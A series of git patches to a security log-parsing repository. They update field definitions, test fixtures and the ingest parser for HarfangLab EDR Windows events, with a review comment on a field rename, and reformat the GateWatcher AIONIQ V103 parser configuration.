"SubjectLogonId": "0x99913777", + "SubjectUserName": "testuser", + "SubjectUserSid": "S-2-2-22-22227555-9999999999-9999999919-2402", + "TargetDomainName": "TEST", + "TargetSid": "S-2-2-22-222222229-9999944444-3976126919-4444", + "TargetUserName": "test_exception" + } + }, + "agent": { + "id": "555555555-9999-9999-9999-3e333333cccc", + "name": "harfanglab" + }, + "harfanglab": { + "groups": [ + "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_Windows\"}", + "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"TEST_Serveurs_haute_disponibilit\\u00e9\"}" + ] + }, + "host": { + "domain": "TEST", + "hostname": "srv-test01", + "name": "srv-test01", + "os": { + "full": "Windows Server 2022 Standard", + "version": "10.0.20348" + } + }, + "log": { + "hostname": "srv-test01" + }, + "organization": { + "id": "fffffca6b999999" + }, + "related": { + "hosts": [ + "srv-test01" + ], + "user": [ + "testuser" + ] + }, + "user": { + "domain": "TEST", + "name": "testuser", + "roles": "TEST_Serveurs_Windows,TEST_Serveurs_haute_disponibilit\u00e9", + "target": { + "domain": "TEST", + "name": "test_exception" + } + } + } +} \ No newline at end of file From e8486c5dbf017d46a73613ee0e667122db534c53 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Tue, 1 Oct 2024 15:58:20 +0200 Subject: [PATCH 095/317] Apply linter --- HarfangLab/harfanglab/_meta/fields.yml | 20 +++++++++---------- .../test_detection_rules_missing_fields.json | 4 ++-- .../test_detection_rules_missing_fields1.json | 4 ++-- 3 files changed, 14 insertions(+), 14 deletions(-) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index ba6699b84..40d115641 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml 
@@ -103,6 +103,11 @@ action.properties.CertThumbprint: name: action.properties.CertThumbprint type: keyword +action.properties.ClassName: + description: '' + name: action.properties.ClassName + type: keyword + action.properties.ClientProcessId: description: '' name: action.properties.ClientProcessId @@ -113,6 +118,11 @@ action.properties.ClientProcessStartKey: name: action.properties.ClientProcessStartKey type: keyword +action.properties.CompatibleIds: + description: '' + name: action.properties.CompatibleIds + type: keyword + action.properties.DetectionID: description: '' name: action.properties.DetectionID @@ -823,16 +833,6 @@ action.properties.WorkstationName: name: action.properties.WorkstationName type: keyword -action.properties.ClassName: - description: '' - name: action.properties.ClassName - type: keyword - -action.properties.CompatibleIds: - description: '' - name: action.properties.CompatibleIds - type: keyword - action.properties.param0: description: '' name: action.properties.param0 diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json index 06b8a8832..46d0a321b 100644 --- a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json +++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}", "sekoiaio": { "intake": { "dialect": "HarfangLab EDR", "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" } - }, - "message": 
"{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}" + } }, "expected": { "message": 
"{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}", diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json index 7927ea00f..6c2dee48d 100644 --- a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json +++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}", "sekoiaio": { "intake": { "dialect": "HarfangLab EDR", "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" } - }, - "message": 
"{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}" + } }, "expected": { "message": 
"{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}", From f1639997370cfb09df38b35c6de9c190e9c2df3c Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya
Date: Tue, 1 Oct 2024 16:16:50 +0200
Subject: [PATCH 096/317] Change device ID field name
---
 HarfangLab/harfanglab/_meta/fields.yml | 5 +++++
 HarfangLab/harfanglab/ingest/parser.yml | 2 +-
 .../tests/test_detection_rules_missing_fields.json | 4 +---
 3 files changed, 7 insertions(+), 4 deletions(-)
diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index 40d115641..611f3c079 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -138,6 +138,11 @@ action.properties.DetectionUser:
 name: action.properties.DetectionUser
 type: keyword
+action.properties.DeviceID:
+ description: ''
+ name: action.properties.DeviceID
+ type: keyword
+
 action.properties.Domain:
 description: ''
 name: action.properties.Domain
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 33437849b..6859ff3dc 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -283,7 +283,7 @@ stages:
 user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
 user.target.name: "{{json_event.message.event_data.TargetUserName}}"
 user.target.domain: "{{json_event.message.event_data.TargetDomainName}}"
- device.id: "{{json_event.message.event_data.DeviceId}}"
+ action.properties.DeviceID: "{{json_event.message.event_data.DeviceId}}"
 action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AS security intelligence creation time')}}"
 action.properties.ASsecurityintelligenceversion: "{{json_event.message.event_data.get('AS security intelligence version')}}"
 action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AV security intelligence creation time')}}"
diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
index 46d0a321b..be8ca3444 100644
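Review bot: The new `action.properties.DeviceID` entry in fields.yml is added with `description: ''`, so the field catalogue says nothing about the value, while the parser.yml hunk on the same line now routes `event_data.DeviceId` there instead of the ECS `device.id` it replaced. The fixture updated in this patch shows a Windows device instance path (`HID\VID_0000&PID_0000\0&...`) on an event 6416 record, so a one-line `description: Device instance identifier (event_data.DeviceId) of the device referenced by the Windows event` would let analysts find the field with intent. Moving the value off `device.id` also means any rule or dashboard that keyed on the ECS field stops matching once this ships; if that is deliberate the commit message should say so, and if not the parser could keep `device.id` populated alongside the new custom field. The enclosing `set` action in parser.yml starts and ends outside the hunk.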
--- a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
+++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json
@@ -23,6 +23,7 @@
 "id": 6416,
 "properties": {
 "ClassName": "ClassnameTest",
+ "DeviceID": "HID\\VID_0000&PID_0000\\0&11111111&0&0000",
 "SubjectDomainName": "TEST",
 "SubjectLogonId": "0x3e7",
 "SubjectUserName": "TEST-MARRA03$",
@@ -33,9 +34,6 @@
 "id": "22222222-8888-9999-aaaa-333333333333",
 "name": "harfanglab"
 },
- "device": {
- "id": "HID\\VID_0000&PID_0000\\0&11111111&0&0000"
- },
 "harfanglab": {
 "groups": [
 "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"Poste_de_travail_testuser\"}"
From 684ef2b0e49481ffaeadc5510313bf6389c66b15 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Tue, 1 Oct 2024 19:19:32 +0200
Subject: [PATCH 097/317] chore(GateWatcher): clean up the AIONIQ V103 parser
---
 GateWatcher/aioniq_ecs/ingest/parser.yml | 846 +++++++++--------------
 1 file changed, 326 insertions(+), 520 deletions(-)
diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml
index 42afcb85b..2c654e662 100644
--- a/GateWatcher/aioniq_ecs/ingest/parser.yml
+++ b/GateWatcher/aioniq_ecs/ingest/parser.yml
@@ -1,768 +1,574 @@ -name: gatewatcher-test-ecs---clem +name: gatewatcher-aioniq-v103 ignored_values: null pipeline: - name: json_load - description: '' - filter: '' + description: "" external: name: json.parse-json properties: - input_field: '{{original.message}}' + input_field: "{{original.message}}" output_field: message - name: parsed_date description: Parsed date - filter: '' - external: null - name: event description: event field - filter: '' - external: null - name: source description: source field - filter: '' - external: null - name: destination description: destination field - filter: '' - external: null - name: observer description: observer field - filter: '' - external: null - name: network description: network field - filter: '' - external: null - name: http description: http metadata fields - filter: '' - external: null - name: file description: file field - filter: '' - external: null - name: dns description: dns field metadata - filter: '' - external: null - name: url description: url field - filter: '' - external: null - name: ecs description: ecs field - filter: '' - external: null - name: user_agent description: user_agent field - filter: '' - external: null - name: version - description: '@version field' - filter: '' - external: null + description: "@version field" - name: tls description: tls field - filter: '' - external: null - name: metadata-flowbits description: metadata flowbits field - filter: '' - external: null - name: smtp description: smtp field - filter: '' - external: null - name: email description: email field - filter: '' - external: null - name: smb description: smb field - filter: '' - external: null - name: nfs description: nfs field - filter: '' - external: null - name: ftp description: ftp field - filter: '' - external: null - name: tftp description: tftp field - filter: '' - external: null - name: ssh description: ssh field - filter: '' - external: null - name: krb5 description: krb5 field - filter: '' - external: null - 
name: dhcp description: dhcp field - filter: '' - external: null - name: ftp_data description: ftp_data field - filter: '' - external: null - name: snmp description: snmp field - filter: '' - external: null - name: rdp description: rdp field - filter: '' - external: null - name: rfb description: rfb field - filter: '' - external: null - name: ikev2 description: ikev 2 field - filter: '' - external: null - name: sip description: sip field - filter: '' - external: null - name: dnp3 description: dnp3 field - filter: '' - external: null - name: dcerpc description: dcerpc field - filter: '' - external: null - name: mqtt description: mqtt field - filter: '' - external: null - name: malcore description: malcore field - filter: '' - external: null - name: sigflow description: sigflow field - filter: '' - external: null - name: flow description: flow field - filter: '' - external: null - name: shellcode description: shellcode field - filter: '' - external: null - name: malicious_powershell description: malicious_powershell field - filter: '' - external: null - name: files description: files field - filter: '' - external: null - name: history description: history field - filter: '' - external: null - name: syslog description: syslog field - filter: '' - external: null - name: notification description: notification field - filter: '' - external: null - name: beacon description: beacon field - filter: '' - external: null - name: retrohunt description: retrohunt field - filter: '' - external: null - name: ransomware_detect description: ransomware_detect field - filter: '' - external: null - name: dga_detect description: dga_detect field - filter: '' - external: null - name: network_behavior_analytics description: network_behavior_analytics field - filter: '' - external: null - name: ioc description: ioc field - filter: '' - external: null stages: parsed_date: actions: - set: - '@timestamp': '{{json_load.message["@timestamp"]}}' - filter: '' - name: set + "@timestamp": 
'{{json_load.message["@timestamp"]}}' event: actions: - set: - event.kind: '{{json_load.message.event.kind}}' - event.module: '{{json_load.message.event.module}}' - event.dataset: '{{json_load.message.event.dataset}}' - event.category: '{{json_load.message.event.category}}' - event.severity: '{{json_load.message.event.severity}}' - gatewatcher.event.id: '{{json_load.message.event.id}}' - gatewatcher.event.created: '{{json_load.message.event.created}}' - filter: '' - name: set + event.kind: "{{json_load.message.event.kind}}" + event.module: "{{json_load.message.event.module}}" + event.dataset: "{{json_load.message.event.dataset}}" + event.category: "{{json_load.message.event.category}}" + event.severity: "{{json_load.message.event.severity}}" + gatewatcher.event.id: "{{json_load.message.event.id}}" + gatewatcher.event.created: "{{json_load.message.event.created}}" source: actions: - set: - source.ip: '{{json_load.message.source.ip}}' - source.mac: '{{json_load.message.source.mac}}' - source.port: '{{json_load.message.source.port}}' - filter: '' - name: set + source.ip: "{{json_load.message.source.ip}}" + source.mac: "{{json_load.message.source.mac}}" + source.port: "{{json_load.message.source.port}}" destination: actions: - set: - destination.ip: '{{json_load.message.destination.ip}}' - destination.mac: '{{json_load.message.destination.mac}}' - destination.port: '{{json_load.message.destination.port}}' - filter: '' - name: set + destination.ip: "{{json_load.message.destination.ip}}" + destination.mac: "{{json_load.message.destination.mac}}" + destination.port: "{{json_load.message.destination.port}}" observer: actions: - set: - observer.vendor: '{{json_load.message.observer.vendor}}' - observer.product: '{{json_load.message.observer.product}}' - observer.version: '{{json_load.message.observer.version}}' - observer.hostname: '{{json_load.message.observer.hostname}}' - gatewatcher.observer.uuid: '{{json_load.message.observer.uuid}}' - 
gatewatcher.observer.gcap.version: '{{json_load.message.observer.gcap.version}}' - gatewatcher.observer.gcap.hostname: '{{json_load.message.observer.gcap.hostname}}' - gatewatcher.observer.log_format_version: '{{json_load.message.observer.log_format_version}}' - gatewatcher.observer.gcap.ingress.interface.name: '{{json_load.message.observer.gcap.ingress.interface.name}}' - filter: '' - name: set + observer.vendor: "{{json_load.message.observer.vendor}}" + observer.product: "{{json_load.message.observer.product}}" + observer.version: "{{json_load.message.observer.version}}" + observer.hostname: "{{json_load.message.observer.hostname}}" + gatewatcher.observer.uuid: "{{json_load.message.observer.uuid}}" + gatewatcher.observer.gcap.version: "{{json_load.message.observer.gcap.version}}" + gatewatcher.observer.gcap.hostname: "{{json_load.message.observer.gcap.hostname}}" + gatewatcher.observer.log_format_version: "{{json_load.message.observer.log_format_version}}" + gatewatcher.observer.gcap.ingress.interface.name: "{{json_load.message.observer.gcap.ingress.interface.name}}" network: actions: - set: - network.vlan.id: '{{json_load.message.network.vlan.id}}' - network.protocol: '{{json_load.message.network.protocol}}' - network.transport: '{{json_load.message.network.transport}}' - network.vlan.name: '{{json_load.message.network.vlan.name}}' - network.community_id: '{{json_load.message.network.community_id}}' - gatewatcher.network.tx_id: '{{json_load.message.network.tx_id}}' - gatewatcher.network.flow_id: '{{json_load.message.network.flow_id}}' - gatewatcher.network.timestamp: '{{json_load.message.network.timestamp}}' - filter: '' - name: set + network.vlan.id: "{{json_load.message.network.vlan.id}}" + network.protocol: "{{json_load.message.network.protocol}}" + network.transport: "{{json_load.message.network.transport}}" + network.vlan.name: "{{json_load.message.network.vlan.name}}" + network.community_id: "{{json_load.message.network.community_id}}" + 
gatewatcher.network.tx_id: "{{json_load.message.network.tx_id}}" + gatewatcher.network.flow_id: "{{json_load.message.network.flow_id}}" + gatewatcher.network.timestamp: "{{json_load.message.network.timestamp}}" http: actions: - set: - http.version: '{{json_load.message.http.version}}' - http.request.method: '{{json_load.message.http.request.method}}' - http.response.bytes: '{{json_load.message.http.response.bytes}}' - gatewatcher.http.http2: '{{json_load.message.http.http2}}' - http.request.mime_type: '{{json_load.message.http.request.mime_type}}' - gatewatcher.http.accept: '{{json_load.message.http.accept}}' - http.response.mime_type: '{{json_load.message.http.response.mime_type}}' - gatewatcher.http.hostname: '{{json_load.message.http.hostname}}' - http.response.status_code: '{{json_load.message.http.response.status}}' - gatewatcher.http.http_refer: '{{json_load.message.http.http_refer}}' - gatewatcher.http.accept_language: '{{json_load.message.http.accept_language}}' - filter: '' - name: set + http.version: "{{json_load.message.http.version}}" + http.request.method: "{{json_load.message.http.request.method}}" + http.response.bytes: "{{json_load.message.http.response.bytes}}" + gatewatcher.http.http2: "{{json_load.message.http.http2}}" + http.request.mime_type: "{{json_load.message.http.request.mime_type}}" + gatewatcher.http.accept: "{{json_load.message.http.accept}}" + http.response.mime_type: "{{json_load.message.http.response.mime_type}}" + gatewatcher.http.hostname: "{{json_load.message.http.hostname}}" + http.response.status_code: "{{json_load.message.http.response.status}}" + gatewatcher.http.http_refer: "{{json_load.message.http.http_refer}}" + gatewatcher.http.accept_language: "{{json_load.message.http.accept_language}}" file: actions: - set: - file.name: '{{json_load.message.file.name}}' - file.size: '{{json_load.message.file.size}}' - file.hash.md5: '{{json_load.message.file.hash.md5}}' - file.hash.sha1: '{{json_load.message.file.hash.sha1}}' - 
file.hash.sha256: '{{json_load.message.file.hash.sha256}}' - gatewatcher.file.sid: '{{json_load.message.file.sid}}' - gatewatcher.file.gaps: '{{json_load.message.file.gaps}}' - gatewatcher.file.magic: '{{json_load.message.file.magic}}' - gatewatcher.file.state: '{{json_load.message.file.state}}' - gatewatcher.file.tx_id: '{{json_load.message.file.tx_id}}' - gatewatcher.file.stored: '{{json_load.message.file.stored}}' - gatewatcher.file.file_id: '{{json_load.message.file.file_id}}' - filter: '' - name: set + file.name: "{{json_load.message.file.name}}" + file.size: "{{json_load.message.file.size}}" + file.hash.md5: "{{json_load.message.file.hash.md5}}" + file.hash.sha1: "{{json_load.message.file.hash.sha1}}" + file.hash.sha256: "{{json_load.message.file.hash.sha256}}" + gatewatcher.file.sid: "{{json_load.message.file.sid}}" + gatewatcher.file.gaps: "{{json_load.message.file.gaps}}" + gatewatcher.file.magic: "{{json_load.message.file.magic}}" + gatewatcher.file.state: "{{json_load.message.file.state}}" + gatewatcher.file.tx_id: "{{json_load.message.file.tx_id}}" + gatewatcher.file.stored: "{{json_load.message.file.stored}}" + gatewatcher.file.file_id: "{{json_load.message.file.file_id}}" dns: actions: - set: - gatewatcher.dns: '{{json_load.message.dns}}' - dns.answers.data: '{{json_load.message.dns.answers.data}}' - dns.answers.type: '{{json_load.message.dns.answers.type}}' - dns.response_code: '{{json_load.message.dns.response_code}}' - filter: '' - name: set + gatewatcher.dns: "{{json_load.message.dns}}" + dns.answers.data: "{{json_load.message.dns.answers.data}}" + dns.answers.type: "{{json_load.message.dns.answers.type}}" + dns.response_code: "{{json_load.message.dns.response_code}}" url: actions: - set: - url.full: '{{json_load.message.url.full}}' - url.path: '{{json_load.message.url.path}}' - url.domain: '{{json_load.message.url.domain}}' - filter: '' - name: set + url.full: "{{json_load.message.url.full}}" + url.path: "{{json_load.message.url.path}}" + 
url.domain: "{{json_load.message.url.domain}}" ecs: actions: - set: - ecs.version: '{{json_load.message.ecs.version}}' - filter: '' - name: set + ecs.version: "{{json_load.message.ecs.version}}" user_agent: actions: - set: - user_agent.name: '{{json_load.message.user_agent.name}}' - user_agent.os.name: '{{json_load.message.user_agent.os.name}}' - user_agent.version: '{{json_load.message.user_agent.version}}' - user_agent.original: '{{json_load.message.user_agent.original}}' - user_agent.os.family: '{{json_load.message.user_agent.os.family}}' - user_agent.os.version: '{{json_load.message.user_agent.os.version}}' - user_agent.device.name: '{{json_load.message.user_agent.device.name}}' - gatewatcher.user_agent.major: '{{json_load.message.user_agent.major}}' - gatewatcher.user_agent.minor: '{{json_load.message.user_agent.minor}}' - gatewatcher.user_agent.patch: '{{json_load.message.user_agent.patch}}' - gatewatcher.user_agent.os.major: '{{json_load.message.user_agent.os.major}}' - filter: '' - name: set + user_agent.name: "{{json_load.message.user_agent.name}}" + user_agent.os.name: "{{json_load.message.user_agent.os.name}}" + user_agent.version: "{{json_load.message.user_agent.version}}" + user_agent.original: "{{json_load.message.user_agent.original}}" + user_agent.os.family: "{{json_load.message.user_agent.os.family}}" + user_agent.os.version: 